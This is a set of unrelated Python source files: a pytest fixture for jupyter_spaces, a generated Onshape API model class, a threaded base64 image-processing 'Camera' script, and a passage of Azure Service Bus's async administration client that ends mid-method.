@pytest.fixture(scope="function")
def ip(session_ip):
session_ip.run_line_magic(magic_name="load_ext", line="jupyter_spaces")
yield session_ip
session_ip.run_line_magic(magic_name="unload_ext", line="jupyter_spaces")
session_ip.run_line_magic(magic_name="reset", line="-f")
|
# coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
class BTTranslationRequestInfo(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
("request_state",): {"ACTIVE": "ACTIVE", "DONE": "DONE", "FAILED": "FAILED",},
}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"document_id": (str,), # noqa: E501
"failure_reason": (str,), # noqa: E501
"href": (str,), # noqa: E501
"id": (str,), # noqa: E501
"name": (str,), # noqa: E501
"request_element_id": (str,), # noqa: E501
"request_state": (str,), # noqa: E501
"result_document_id": (str,), # noqa: E501
"result_element_ids": ([str],), # noqa: E501
"result_external_data_ids": ([str],), # noqa: E501
"result_workspace_id": (str,), # noqa: E501
"version_id": (str,), # noqa: E501
"view_ref": (str,), # noqa: E501
"workspace_id": (str,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"document_id": "documentId", # noqa: E501
"failure_reason": "failureReason", # noqa: E501
"href": "href", # noqa: E501
"id": "id", # noqa: E501
"name": "name", # noqa: E501
"request_element_id": "requestElementId", # noqa: E501
"request_state": "requestState", # noqa: E501
"result_document_id": "resultDocumentId", # noqa: E501
"result_element_ids": "resultElementIds", # noqa: E501
"result_external_data_ids": "resultExternalDataIds", # noqa: E501
"result_workspace_id": "resultWorkspaceId", # noqa: E501
"version_id": "versionId", # noqa: E501
"view_ref": "viewRef", # noqa: E501
"workspace_id": "workspaceId", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""bt_translation_request_info.BTTranslationRequestInfo - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
document_id (str): [optional] # noqa: E501
failure_reason (str): [optional] # noqa: E501
href (str): [optional] # noqa: E501
id (str): [optional] # noqa: E501
name (str): [optional] # noqa: E501
request_element_id (str): [optional] # noqa: E501
request_state (str): [optional] # noqa: E501
result_document_id (str): [optional] # noqa: E501
result_element_ids ([str]): [optional] # noqa: E501
result_external_data_ids ([str]): [optional] # noqa: E501
result_workspace_id (str): [optional] # noqa: E501
version_id (str): [optional] # noqa: E501
view_ref (str): [optional] # noqa: E501
workspace_id (str): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
|
import threading
import binascii
from time import sleep
from utils import *
############################################################################
import base64
import io
from PIL import Image
def img_to_txt(filename):
msg = b"<plain_txt_msg:img>"
with open(filename, "rb") as imageFile:
msg = msg + base64.b64encode(imageFile.read())
msg = msg + b"<!plain_txt_msg>"
return msg
def decode_img(msg):
msg = msg[msg.find(b"<plain_txt_msg:img>")+len(b"<plain_txt_msg:img>"):
msg.find(b"<!plain_txt_msg>")]
msg = base64.b64decode(msg)
buf = io.BytesIO(msg)
img = Image.open(buf)
return img
# filename = 'test.png'
# msg = img_to_txt(filename)
# img = decode_img(msg)
# img.show()
#########################################################################
class Camera(object):
def __init__(self, makeup_artist):
self.to_process = []
self.to_output = []
self.makeup_artist = makeup_artist
thread = threading.Thread(target=self.keep_processing, args=())
thread.daemon = True
thread.start()
def process_one(self):
if not self.to_process:
return
# input is an ascii string.
input_str = self.to_process.pop(0)
# convert it to a pil image
input_img = decode_img(input_str)
input_img.show()
        input_img = input_img.convert('1')  # convert() returns a new image; keep the binarized copy
input_img.show()
################## where the hard work is done ############
        # output_img is a PIL image
output_img = self.makeup_artist.apply_makeup(input_img)
# output_str is a base64 string in ascii
output_str = img_to_txt(output_img)
        # convert the base64 string in ascii to a base64 string in _bytes_
self.to_output.append(binascii.a2b_base64(output_str))
def keep_processing(self):
while True:
self.process_one()
sleep(0.01)
def enqueue_input(self, input):
self.to_process.append(input)
def get_frame(self):
while not self.to_output:
sleep(0.05)
return self.to_output.pop(0)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint:disable=protected-access
# pylint:disable=specify-parameter-names-in-call
# pylint:disable=too-many-lines
import functools
from typing import TYPE_CHECKING, Any, Union, cast
from xml.etree.ElementTree import ElementTree
from azure.core.async_paging import AsyncItemPaged
from azure.core.exceptions import ResourceNotFoundError
from azure.core.pipeline import AsyncPipeline
from azure.core.pipeline.policies import HttpLoggingPolicy, DistributedTracingPolicy, ContentDecodePolicy, \
RequestIdPolicy, AsyncBearerTokenCredentialPolicy
from azure.core.pipeline.transport import AioHttpTransport
from ...management._generated.models import QueueDescriptionFeed, TopicDescriptionEntry, \
QueueDescriptionEntry, SubscriptionDescriptionFeed, SubscriptionDescriptionEntry, RuleDescriptionEntry, \
RuleDescriptionFeed, NamespacePropertiesEntry, CreateTopicBody, CreateTopicBodyContent, \
TopicDescriptionFeed, CreateSubscriptionBody, CreateSubscriptionBodyContent, CreateRuleBody, \
CreateRuleBodyContent, CreateQueueBody, CreateQueueBodyContent
from ..._common.utils import parse_conn_str
from ..._common.constants import JWT_TOKEN_SCOPE
from ...aio._base_handler_async import ServiceBusSharedKeyCredential, ServiceBusSASTokenCredential
from ...management._generated.aio._configuration_async import ServiceBusManagementClientConfiguration
from ...management._generated.aio._service_bus_management_client_async import ServiceBusManagementClient \
as ServiceBusManagementClientImpl
from ...management import _constants as constants
from ._shared_key_policy_async import AsyncServiceBusSharedKeyCredentialPolicy
from ...management._models import QueueRuntimeProperties, QueueProperties, TopicProperties, TopicRuntimeProperties, \
SubscriptionProperties, SubscriptionRuntimeProperties, RuleProperties, NamespaceProperties
from ...management._xml_workaround_policy import ServiceBusXMLWorkaroundPolicy
from ...management._handle_response_error import _handle_response_error
from ...management._model_workaround import avoid_timedelta_overflow
from ._utils import extract_data_template, extract_rule_data_template, get_next_template
from ...management._utils import deserialize_rule_key_values, serialize_rule_key_values
if TYPE_CHECKING:
from azure.core.credentials_async import AsyncTokenCredential # pylint:disable=ungrouped-imports
class ServiceBusAdministrationClient: #pylint:disable=too-many-public-methods
"""Use this client to create, update, list, and delete resources of a ServiceBus namespace.
:param str fully_qualified_namespace: The fully qualified host name for the Service Bus namespace.
:param credential: To authenticate to manage the entities of the ServiceBus namespace.
:type credential: AsyncTokenCredential
"""
def __init__(
self, fully_qualified_namespace: str,
credential: "AsyncTokenCredential",
**kwargs) -> None:
self.fully_qualified_namespace = fully_qualified_namespace
self._credential = credential
self._endpoint = "https://" + fully_qualified_namespace
self._config = ServiceBusManagementClientConfiguration(self._endpoint, **kwargs)
self._pipeline = self._build_pipeline()
self._impl = ServiceBusManagementClientImpl(endpoint=fully_qualified_namespace, pipeline=self._pipeline)
async def __aenter__(self) -> "ServiceBusAdministrationClient":
await self._impl.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._impl.__aexit__(*exc_details)
def _build_pipeline(self, **kwargs): # pylint: disable=no-self-use
transport = kwargs.get('transport')
policies = kwargs.get('policies')
credential_policy = \
AsyncServiceBusSharedKeyCredentialPolicy(self._endpoint, self._credential, "Authorization") \
if isinstance(self._credential, ServiceBusSharedKeyCredential) \
else AsyncBearerTokenCredentialPolicy(self._credential, JWT_TOKEN_SCOPE)
if policies is None: # [] is a valid policy list
policies = [
RequestIdPolicy(**kwargs),
self._config.headers_policy,
self._config.user_agent_policy,
self._config.proxy_policy,
ContentDecodePolicy(**kwargs),
ServiceBusXMLWorkaroundPolicy(),
self._config.redirect_policy,
self._config.retry_policy,
credential_policy,
self._config.logging_policy,
DistributedTracingPolicy(**kwargs),
HttpLoggingPolicy(**kwargs),
]
if not transport:
transport = AioHttpTransport(**kwargs)
return AsyncPipeline(transport, policies)
async def _get_entity_element(self, entity_name, enrich=False, **kwargs):
# type: (str, bool, Any) -> ElementTree
with _handle_response_error():
element = cast(
ElementTree,
await self._impl.entity.get(entity_name, enrich=enrich, api_version=constants.API_VERSION, **kwargs)
)
return element
async def _get_subscription_element(self, topic_name, subscription_name, enrich=False, **kwargs):
# type: (str, str, bool, Any) -> ElementTree
with _handle_response_error():
element = cast(
ElementTree,
await self._impl.subscription.get(
topic_name, subscription_name, enrich=enrich, api_version=constants.API_VERSION, **kwargs)
)
return element
async def _get_rule_element(self, topic_name, subscription_name, rule_name, **kwargs):
# type: (str, str, str, Any) -> ElementTree
with _handle_response_error():
element = cast(
ElementTree,
await self._impl.rule.get(
topic_name, subscription_name, rule_name, enrich=False, api_version=constants.API_VERSION, **kwargs)
)
return element
@classmethod
def from_connection_string(cls, conn_str: str, **kwargs: Any) -> "ServiceBusAdministrationClient":
"""Create a client from connection string.
:param str conn_str: The connection string of the Service Bus Namespace.
:rtype: ~azure.servicebus.management.aio.ServiceBusAdministrationClient
"""
endpoint, shared_access_key_name, shared_access_key, _, token, token_expiry = parse_conn_str(conn_str)
if token and token_expiry:
credential = ServiceBusSASTokenCredential(token, token_expiry)
elif shared_access_key_name and shared_access_key:
credential = ServiceBusSharedKeyCredential(shared_access_key_name, shared_access_key) # type: ignore
if "//" in endpoint:
endpoint = endpoint[endpoint.index("//")+2:]
return cls(endpoint, credential, **kwargs) # type: ignore
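    # Sketch of building a client from a connection string (placeholder values):
    #
    #   client = ServiceBusAdministrationClient.from_connection_string(
    #       "Endpoint=sb://<my-namespace>.servicebus.windows.net/;"
    #       "SharedAccessKeyName=<key-name>;SharedAccessKey=<key>")
    #   async with client:
    #       queue = await client.get_queue("myqueue")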
async def get_queue(self, queue_name: str, **kwargs) -> QueueProperties:
"""Get the properties of a queue.
:param str queue_name: The name of the queue.
:rtype: ~azure.servicebus.management.QueueProperties
"""
entry_ele = await self._get_entity_element(queue_name, **kwargs)
entry = QueueDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError("Queue '{}' does not exist".format(queue_name))
queue_description = QueueProperties._from_internal_entity(queue_name,
entry.content.queue_description)
return queue_description
async def get_queue_runtime_properties(self, queue_name: str, **kwargs) -> QueueRuntimeProperties:
"""Get the runtime information of a queue.
:param str queue_name: The name of the queue.
:rtype: ~azure.servicebus.management.QueueRuntimeProperties
"""
entry_ele = await self._get_entity_element(queue_name, **kwargs)
entry = QueueDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError("Queue {} does not exist".format(queue_name))
runtime_properties = QueueRuntimeProperties._from_internal_entity(queue_name,
entry.content.queue_description)
return runtime_properties
async def create_queue(self, name: str, **kwargs) -> QueueProperties:
"""Create a queue.
:param name: Name of the queue.
:type name: str
:keyword authorization_rules: Authorization rules for resource.
:type authorization_rules: list[~azure.servicebus.management.AuthorizationRule]
:keyword auto_delete_on_idle: ISO 8601 timeSpan idle interval after which the queue is
automatically deleted. The minimum duration is 5 minutes.
:type auto_delete_on_idle: ~datetime.timedelta
:keyword dead_lettering_on_message_expiration: A value that indicates whether this queue has dead
letter support when a message expires.
:type dead_lettering_on_message_expiration: bool
:keyword default_message_time_to_live: ISO 8601 default message timespan to live value. This is
the duration after which the message expires, starting from when the message is sent to Service
Bus. This is the default value used when TimeToLive is not set on a message itself.
:type default_message_time_to_live: ~datetime.timedelta
:keyword duplicate_detection_history_time_window: ISO 8601 timeSpan structure that defines the
duration of the duplicate detection history. The default value is 10 minutes.
:type duplicate_detection_history_time_window: ~datetime.timedelta
:keyword enable_batched_operations: Value that indicates whether server-side batched operations
are enabled.
:type enable_batched_operations: bool
:keyword enable_express: A value that indicates whether Express Entities are enabled. An express
queue holds a message in memory temporarily before writing it to persistent storage.
:type enable_express: bool
:keyword enable_partitioning: A value that indicates whether the queue is to be partitioned
across multiple message brokers.
:type enable_partitioning: bool
:keyword lock_duration: ISO 8601 timespan duration of a peek-lock; that is, the amount of time
that the message is locked for other receivers. The maximum value for LockDuration is 5
minutes; the default value is 1 minute.
:type lock_duration: ~datetime.timedelta
:keyword max_delivery_count: The maximum delivery count. A message is automatically deadlettered
after this number of deliveries. Default value is 10.
:type max_delivery_count: int
:keyword max_size_in_megabytes: The maximum size of the queue in megabytes, which is the size of
memory allocated for the queue.
:type max_size_in_megabytes: int
:keyword requires_duplicate_detection: A value indicating if this queue requires duplicate
detection.
:type requires_duplicate_detection: bool
:keyword requires_session: A value that indicates whether the queue supports the concept of
sessions.
:type requires_session: bool
:keyword forward_to: The name of the recipient entity to which all the messages sent to the queue
are forwarded to.
:type forward_to: str
:keyword user_metadata: Custom metadata that the user can associate with the description. Max length
is 1024 chars.
:type user_metadata: str
:keyword forward_dead_lettered_messages_to: The name of the recipient entity to which all the
dead-lettered messages of this subscription are forwarded to.
:type forward_dead_lettered_messages_to: str
:rtype: ~azure.servicebus.management.QueueProperties
"""
queue = QueueProperties(
name,
authorization_rules=kwargs.pop("authorization_rules", None),
auto_delete_on_idle=kwargs.pop("auto_delete_on_idle", None),
dead_lettering_on_message_expiration=kwargs.pop("dead_lettering_on_message_expiration", None),
default_message_time_to_live=kwargs.pop("default_message_time_to_live", None),
duplicate_detection_history_time_window=kwargs.pop("duplicate_detection_history_time_window", None),
availability_status=None,
enable_batched_operations=kwargs.pop("enable_batched_operations", None),
enable_express=kwargs.pop("enable_express", None),
enable_partitioning=kwargs.pop("enable_partitioning", None),
lock_duration=kwargs.pop("lock_duration", None),
max_delivery_count=kwargs.pop("max_delivery_count", None),
max_size_in_megabytes=kwargs.pop("max_size_in_megabytes", None),
requires_duplicate_detection=kwargs.pop("requires_duplicate_detection", None),
requires_session=kwargs.pop("requires_session", None),
status=kwargs.pop("status", None),
forward_to=kwargs.pop("forward_to", None),
forward_dead_lettered_messages_to=kwargs.pop("forward_dead_lettered_messages_to", None),
user_metadata=kwargs.pop("user_metadata", None)
)
to_create = queue._to_internal_entity()
create_entity_body = CreateQueueBody(
content=CreateQueueBodyContent(
queue_description=to_create, # type: ignore
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
entry_ele = cast(
ElementTree,
await self._impl.entity.put(
name, # type: ignore
request_body, api_version=constants.API_VERSION, **kwargs)
)
entry = QueueDescriptionEntry.deserialize(entry_ele)
result = QueueProperties._from_internal_entity(name,
entry.content.queue_description)
return result
async def update_queue(self, queue: QueueProperties, **kwargs) -> None:
"""Update a queue.
Before calling this method, you should use `get_queue`, `create_queue` or `list_queues` to get a
`QueueProperties` instance, then update the properties. Only a portion of properties can
be updated. Refer to https://docs.microsoft.com/en-us/rest/api/servicebus/update-queue.
:param queue: The queue that is returned from `get_queue`, `create_queue` or `list_queues` and
has the updated properties.
:type queue: ~azure.servicebus.management.QueueProperties
:rtype: None
"""
to_update = queue._to_internal_entity()
to_update.default_message_time_to_live = avoid_timedelta_overflow(to_update.default_message_time_to_live)
to_update.auto_delete_on_idle = avoid_timedelta_overflow(to_update.auto_delete_on_idle)
create_entity_body = CreateQueueBody(
content=CreateQueueBodyContent(
queue_description=to_update,
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
await self._impl.entity.put(
queue.name, # type: ignore
request_body,
api_version=constants.API_VERSION,
if_match="*",
**kwargs
)
async def delete_queue(self, queue: Union[str, QueueProperties], **kwargs) -> None:
"""Delete a queue.
:param Union[str, ~azure.servicebus.management.QueueProperties] queue: The name of the queue or
a `QueueProperties` with name.
:rtype: None
"""
try:
queue_name = queue.name # type: ignore
except AttributeError:
queue_name = queue
if not queue_name:
raise ValueError("queue_name must not be None or empty")
with _handle_response_error():
await self._impl.entity.delete(queue_name, api_version=constants.API_VERSION, **kwargs)
def list_queues(self, **kwargs: Any) -> AsyncItemPaged[QueueProperties]:
"""List the queues of a ServiceBus namespace.
:returns: An iterable (auto-paging) response of QueueProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.QueueProperties]
"""
def entry_to_qd(entry):
qd = QueueProperties._from_internal_entity(entry.title, entry.content.queue_description)
return qd
extract_data = functools.partial(
extract_data_template, QueueDescriptionFeed, entry_to_qd
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_entities, constants.ENTITY_TYPE_QUEUES), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
def list_queues_runtime_properties(self, **kwargs: Any) -> AsyncItemPaged[QueueRuntimeProperties]:
"""List the runtime information of the queues in a ServiceBus namespace.
:returns: An iterable (auto-paging) response of QueueRuntimeProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.QueueRuntimeProperties]
"""
def entry_to_qr(entry):
qd = QueueRuntimeProperties._from_internal_entity(entry.title, entry.content.queue_description)
return qd
extract_data = functools.partial(
extract_data_template, QueueDescriptionFeed, entry_to_qr
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_entities, constants.ENTITY_TYPE_QUEUES), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
async def get_topic(self, topic_name: str, **kwargs) -> TopicProperties:
"""Get the properties of a topic.
:param str topic_name: The name of the topic.
:rtype: ~azure.servicebus.management.TopicProperties
"""
entry_ele = await self._get_entity_element(topic_name, **kwargs)
entry = TopicDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError("Topic '{}' does not exist".format(topic_name))
topic_description = TopicProperties._from_internal_entity(topic_name, entry.content.topic_description)
return topic_description
async def get_topic_runtime_properties(self, topic_name: str, **kwargs) -> TopicRuntimeProperties:
"""Get the runtime information of a topic.
:param str topic_name: The name of the topic.
:rtype: ~azure.servicebus.management.TopicRuntimeProperties
"""
entry_ele = await self._get_entity_element(topic_name, **kwargs)
entry = TopicDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError("Topic {} does not exist".format(topic_name))
topic_description = TopicRuntimeProperties._from_internal_entity(topic_name, entry.content.topic_description)
return topic_description
async def create_topic(self, name: str, **kwargs) -> TopicProperties:
"""Create a topic.
:param name: Name of the topic.
:type name: str
:keyword default_message_time_to_live: ISO 8601 default message timespan to live value. This is
the duration after which the message expires, starting from when the message is sent to Service
Bus. This is the default value used when TimeToLive is not set on a message itself.
:type default_message_time_to_live: ~datetime.timedelta
:keyword max_size_in_megabytes: The maximum size of the topic in megabytes, which is the size of
memory allocated for the topic.
:type max_size_in_megabytes: int
:keyword requires_duplicate_detection: A value indicating if this topic requires duplicate
detection.
:type requires_duplicate_detection: bool
:keyword duplicate_detection_history_time_window: ISO 8601 timeSpan structure that defines the
duration of the duplicate detection history. The default value is 10 minutes.
:type duplicate_detection_history_time_window: ~datetime.timedelta
:keyword enable_batched_operations: Value that indicates whether server-side batched operations
are enabled.
:type enable_batched_operations: bool
:keyword size_in_bytes: The size of the topic, in bytes.
:type size_in_bytes: int
:keyword filtering_messages_before_publishing: Filter messages before publishing.
:type filtering_messages_before_publishing: bool
:keyword authorization_rules: Authorization rules for resource.
:type authorization_rules:
list[~azure.servicebus.management.AuthorizationRule]
:keyword support_ordering: A value that indicates whether the topic supports ordering.
:type support_ordering: bool
:keyword auto_delete_on_idle: ISO 8601 timeSpan idle interval after which the topic is
automatically deleted. The minimum duration is 5 minutes.
:type auto_delete_on_idle: ~datetime.timedelta
:keyword enable_partitioning: A value that indicates whether the topic is to be partitioned
across multiple message brokers.
:type enable_partitioning: bool
:keyword enable_express: A value that indicates whether Express Entities are enabled. An express
topic holds a message in memory temporarily before writing it to persistent storage.
:type enable_express: bool
:keyword user_metadata: Metadata associated with the topic.
:type user_metadata: str
:rtype: ~azure.servicebus.management.TopicProperties
"""
topic = TopicProperties(
name,
default_message_time_to_live=kwargs.pop("default_message_time_to_live", None),
max_size_in_megabytes=kwargs.pop("max_size_in_megabytes", None),
requires_duplicate_detection=kwargs.pop("requires_duplicate_detection", None),
duplicate_detection_history_time_window=kwargs.pop("duplicate_detection_history_time_window", None),
enable_batched_operations=kwargs.pop("enable_batched_operations", None),
size_in_bytes=kwargs.pop("size_in_bytes", None),
authorization_rules=kwargs.pop("authorization_rules", None),
status=kwargs.pop("status", None),
support_ordering=kwargs.pop("support_ordering", None),
auto_delete_on_idle=kwargs.pop("auto_delete_on_idle", None),
enable_partitioning=kwargs.pop("enable_partitioning", None),
availability_status=None,
enable_express=kwargs.pop("enable_express", None),
user_metadata=kwargs.pop("user_metadata", None)
)
to_create = topic._to_internal_entity()
create_entity_body = CreateTopicBody(
content=CreateTopicBodyContent(
topic_description=to_create, # type: ignore
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
entry_ele = cast(
ElementTree,
await self._impl.entity.put(
name, # type: ignore
request_body, api_version=constants.API_VERSION, **kwargs)
)
entry = TopicDescriptionEntry.deserialize(entry_ele)
result = TopicProperties._from_internal_entity(name, entry.content.topic_description)
return result
async def update_topic(self, topic: TopicProperties, **kwargs) -> None:
"""Update a topic.
Before calling this method, you should use `get_topic`, `create_topic` or `list_topics` to get a
`TopicProperties` instance, then update the properties. Only a portion of properties can be updated.
Refer to https://docs.microsoft.com/en-us/rest/api/servicebus/update-topic.
:param topic: The topic that is returned from `get_topic`, `create_topic`, or `list_topics`
and has the updated properties.
:type topic: ~azure.servicebus.management.TopicProperties
:rtype: None
"""
to_update = topic._to_internal_entity()
to_update.default_message_time_to_live = avoid_timedelta_overflow(to_update.default_message_time_to_live)
to_update.auto_delete_on_idle = avoid_timedelta_overflow(to_update.auto_delete_on_idle)
create_entity_body = CreateTopicBody(
content=CreateTopicBodyContent(
topic_description=to_update,
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
await self._impl.entity.put(
topic.name, # type: ignore
request_body,
api_version=constants.API_VERSION,
if_match="*",
**kwargs
)
async def delete_topic(self, topic: Union[str, TopicProperties], **kwargs) -> None:
"""Delete a topic.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic to be deleted.
:rtype: None
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
await self._impl.entity.delete(topic_name, api_version=constants.API_VERSION, **kwargs)
def list_topics(self, **kwargs: Any) -> AsyncItemPaged[TopicProperties]:
"""List the topics of a ServiceBus namespace.
:returns: An iterable (auto-paging) response of TopicProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.TopicProperties]
"""
def entry_to_topic(entry):
topic = TopicProperties._from_internal_entity(entry.title, entry.content.topic_description)
return topic
extract_data = functools.partial(
extract_data_template, TopicDescriptionFeed, entry_to_topic
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_entities, constants.ENTITY_TYPE_TOPICS), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
def list_topics_runtime_properties(self, **kwargs: Any) -> AsyncItemPaged[TopicRuntimeProperties]:
"""List the topics runtime information of a ServiceBus namespace.
:returns: An iterable (auto-paging) response of TopicRuntimeProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.TopicRuntimeProperties]
"""
def entry_to_topic(entry):
topic = TopicRuntimeProperties._from_internal_entity(entry.title, entry.content.topic_description)
return topic
extract_data = functools.partial(
extract_data_template, TopicDescriptionFeed, entry_to_topic
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_entities, constants.ENTITY_TYPE_TOPICS), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
async def get_subscription(
self, topic: Union[str, TopicProperties], subscription_name: str, **kwargs
) -> SubscriptionProperties:
"""Get the properties of a topic subscription.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param str subscription_name: name of the subscription.
:rtype: ~azure.servicebus.management.SubscriptionProperties
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
entry_ele = await self._get_subscription_element(topic_name, subscription_name, **kwargs)
entry = SubscriptionDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError(
"Subscription('Topic: {}, Subscription: {}') does not exist".format(subscription_name, topic_name))
subscription = SubscriptionProperties._from_internal_entity(
entry.title, entry.content.subscription_description)
return subscription
async def get_subscription_runtime_properties(
self, topic: Union[str, TopicProperties], subscription_name: str, **kwargs
) -> SubscriptionRuntimeProperties:
"""Get a topic subscription runtime info.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param str subscription_name: name of the subscription.
:rtype: ~azure.servicebus.management.SubscriptionRuntimeProperties
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
entry_ele = await self._get_subscription_element(topic_name, subscription_name, **kwargs)
entry = SubscriptionDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError(
"Subscription('Topic: {}, Subscription: {}') does not exist".format(subscription_name, topic_name))
subscription = SubscriptionRuntimeProperties._from_internal_entity(
entry.title, entry.content.subscription_description)
return subscription
async def create_subscription(
self, topic: Union[str, TopicProperties], name: str, **kwargs
) -> SubscriptionProperties:
"""Create a topic subscription.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that will own the
to-be-created subscription.
:param name: Name of the subscription.
:type name: str
:keyword lock_duration: ISO 8601 timespan duration of a peek-lock; that is, the amount of time
that the message is locked for other receivers. The maximum value for LockDuration is 5
minutes; the default value is 1 minute.
:type lock_duration: ~datetime.timedelta
:keyword requires_session: A value that indicates whether the queue supports the concept of
sessions.
:type requires_session: bool
:keyword default_message_time_to_live: ISO 8601 default message timespan to live value. This is
the duration after which the message expires, starting from when the message is sent to Service
Bus. This is the default value used when TimeToLive is not set on a message itself.
:type default_message_time_to_live: ~datetime.timedelta
:keyword dead_lettering_on_message_expiration: A value that indicates whether this subscription
has dead letter support when a message expires.
:type dead_lettering_on_message_expiration: bool
:keyword dead_lettering_on_filter_evaluation_exceptions: A value that indicates whether this
subscription has dead letter support on filter evaluation exceptions.
:type dead_lettering_on_filter_evaluation_exceptions: bool
:keyword max_delivery_count: The maximum delivery count. A message is automatically deadlettered
after this number of deliveries. Default value is 10.
:type max_delivery_count: int
:keyword enable_batched_operations: Value that indicates whether server-side batched operations
are enabled.
:type enable_batched_operations: bool
:keyword forward_to: The name of the recipient entity to which all the messages sent to the
subscription are forwarded to.
:type forward_to: str
:keyword user_metadata: Metadata associated with the subscription. Maximum number of characters
is 1024.
:type user_metadata: str
:keyword forward_dead_lettered_messages_to: The name of the recipient entity to which all the
dead-lettered messages of this subscription are forwarded to.
:type forward_dead_lettered_messages_to: str
:keyword auto_delete_on_idle: ISO 8601 timeSpan idle interval after which the subscription is
automatically deleted. The minimum duration is 5 minutes.
:type auto_delete_on_idle: ~datetime.timedelta
:rtype: ~azure.servicebus.management.SubscriptionProperties
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
subscription = SubscriptionProperties(
name,
lock_duration=kwargs.pop("lock_duration", None),
requires_session=kwargs.pop("requires_session", None),
default_message_time_to_live=kwargs.pop("default_message_time_to_live", None),
dead_lettering_on_message_expiration=kwargs.pop("dead_lettering_on_message_expiration", None),
dead_lettering_on_filter_evaluation_exceptions=kwargs.pop("dead_lettering_on_filter_evaluation_exceptions", None),
max_delivery_count=kwargs.pop("max_delivery_count", None),
enable_batched_operations=kwargs.pop("enable_batched_operations", None),
status=kwargs.pop("status", None),
forward_to=kwargs.pop("forward_to", None),
user_metadata=kwargs.pop("user_metadata", None),
forward_dead_lettered_messages_to=kwargs.pop("forward_dead_lettered_messages_to", None),
auto_delete_on_idle=kwargs.pop("auto_delete_on_idle", None),
availability_status=None,
)
to_create = subscription._to_internal_entity() # type: ignore # pylint:disable=protected-access
create_entity_body = CreateSubscriptionBody(
content=CreateSubscriptionBodyContent(
subscription_description=to_create, # type: ignore
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
entry_ele = cast(
ElementTree,
await self._impl.subscription.put(
topic_name,
name, # type: ignore
request_body, api_version=constants.API_VERSION, **kwargs)
)
